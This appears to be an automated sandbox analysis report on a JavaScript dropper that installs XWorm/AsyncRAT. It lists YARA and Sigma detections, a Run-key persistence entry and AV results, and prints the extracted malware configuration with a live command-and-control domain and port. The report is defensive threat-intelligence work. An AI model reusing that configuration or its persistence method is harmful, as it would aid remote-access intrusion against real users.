Safari/537.36 0x2c4e2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x103e2:$cnc4: POST / HTTP/1.1 0x19626:$cnc4: POST / HTTP/1.1 0x22882:$cnc4: POST / HTTP/1.1 0x2bfde:$cnc4: POST / HTTP/1.1
2.2.fzP.exe.3234350.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.fzP.exe.3234350.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaf0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x17d34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x20f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2a8e8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb8d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x17dd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2102d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2a985:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xeca2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x17ee6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x21142:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2aa9a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe79e:$cnc4: POST / HTTP/1.1 0x179e2:$cnc4: POST / HTTP/1.1 0x20c3e:$cnc4: POST / HTTP/1.1 0x2a596:$cnc4: POST / HTTP/1.1
11.2.Service.exe.2dde3e8.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.2dde3e8.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xce94:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x160d8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1f334:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28a90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcf31:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16175:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1f3d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28b2d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xd046:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1628a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1f4e6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28c42:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xcb42:$cnc4: POST / HTTP/1.1 0x15d86:$cnc4: POST / HTTP/1.1 0x1efe2:$cnc4: POST / HTTP/1.1 0x2873e:$cnc4: POST / HTTP/1.1
11.2.Service.exe.2cd2728.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.2cd2728.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10728:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1996c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x22bc8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2c524:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x56d78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5ffbc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x69218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x72980:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x97774:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa09b8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa9c14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb3370:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd8164:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe13a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xea604:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x107c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x19a09:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x22c65:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2c5c1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x56e15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x60059:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
4.2.fzP.exe.2bda998.5.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.fzP.exe.2bda998.5.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaf0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x17d34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x20f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2a6f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f4ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x58730:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6198c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6b0e8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8fedc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x99120:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa237c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xabad8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd08cc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd9b10:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe2d6c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xec4c8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb8d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x17dd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2102d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2a795:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4f589:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
4.2.fzP.exe.2bdc5f4.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.fzP.exe.2bdc5f4.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xce94:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x160d8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1f334:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28a9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4d890:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x56ad4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5fd30:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6948c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8e280:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x974c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0720:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa9e7c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcec70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd7eb4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe1110:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xea86c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcf31:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16175:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1f3d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28b39:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4d92d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
11.2.Service.exe.2cd4360.5.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.2cd4360.5.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaf0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x17d34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x20f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2a8ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x55140:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5e384:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x675e0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x70d48:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x95b3c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9ed80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa7fdc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb1738:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd652c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdf770:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe89cc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb8d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x17dd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2102d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2a989:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x551dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5e421:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
11.2.Service.exe.2cd5fbc.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.2cd5fbc.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xce94:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x160d8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1f334:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28c90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x534e4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5c728:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x65984:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f0ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x93ee0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9d124:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa6380:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xafadc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd48d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xddb14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe6d70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcf31:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16175:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1f3d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28d2d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x53581:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5c7c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
4.2.fzP.exe.2bd8d54.6.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.fzP.exe.2bd8d54.6.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10734:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x19978:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x22bd4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2c33c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x51130:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5a374:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x635d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6cd2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x91b20:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9ad64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa3fc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xad71c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd2510:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdb754:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe49b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xee10c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x107d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x19a15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x22c71:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2c3d9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x511cd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\fzP.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\fzP.exe, ProcessId: 2748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js", ProcessId: 5628, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\fzP.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\fzP.exe, ProcessId: 2748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js", ProcessId: 5628, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: kixx.js

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Service.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["kizitodavina.duckdns.org"], "Port": "8645", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.3"}

Multi AV Scanner detection for domain / URL

Source: kizitodavina.duckdns.org	Virustotal: Detection: 11%			Perma Link
Source: kizitodavina.duckdns.org	Virustotal: Detection: 11%			Perma Link

Multi AV Scanner detection for submitted file

Source: kixx.js	ReversingLabs: Detection: 34%
Source: kixx.js	Virustotal: Detection: 20%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Service.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 5.2.fzP.exe.400000.0.unpack	String decryptor: kizitodavina.duckdns.org
Source: 5.2.fzP.exe.400000.0.unpack	String decryptor: 8645
Source: 5.2.fzP.exe.400000.0.unpack	String decryptor: <123456789>
Source: 5.2.fzP.exe.400000.0.unpack	String decryptor: <Xwormmm>
Source: 5.2.fzP.exe.400000.0.unpack	String decryptor: XWorm V5.3
Source: 5.2.fzP.exe.400000.0.unpack	String decryptor: USB.exe

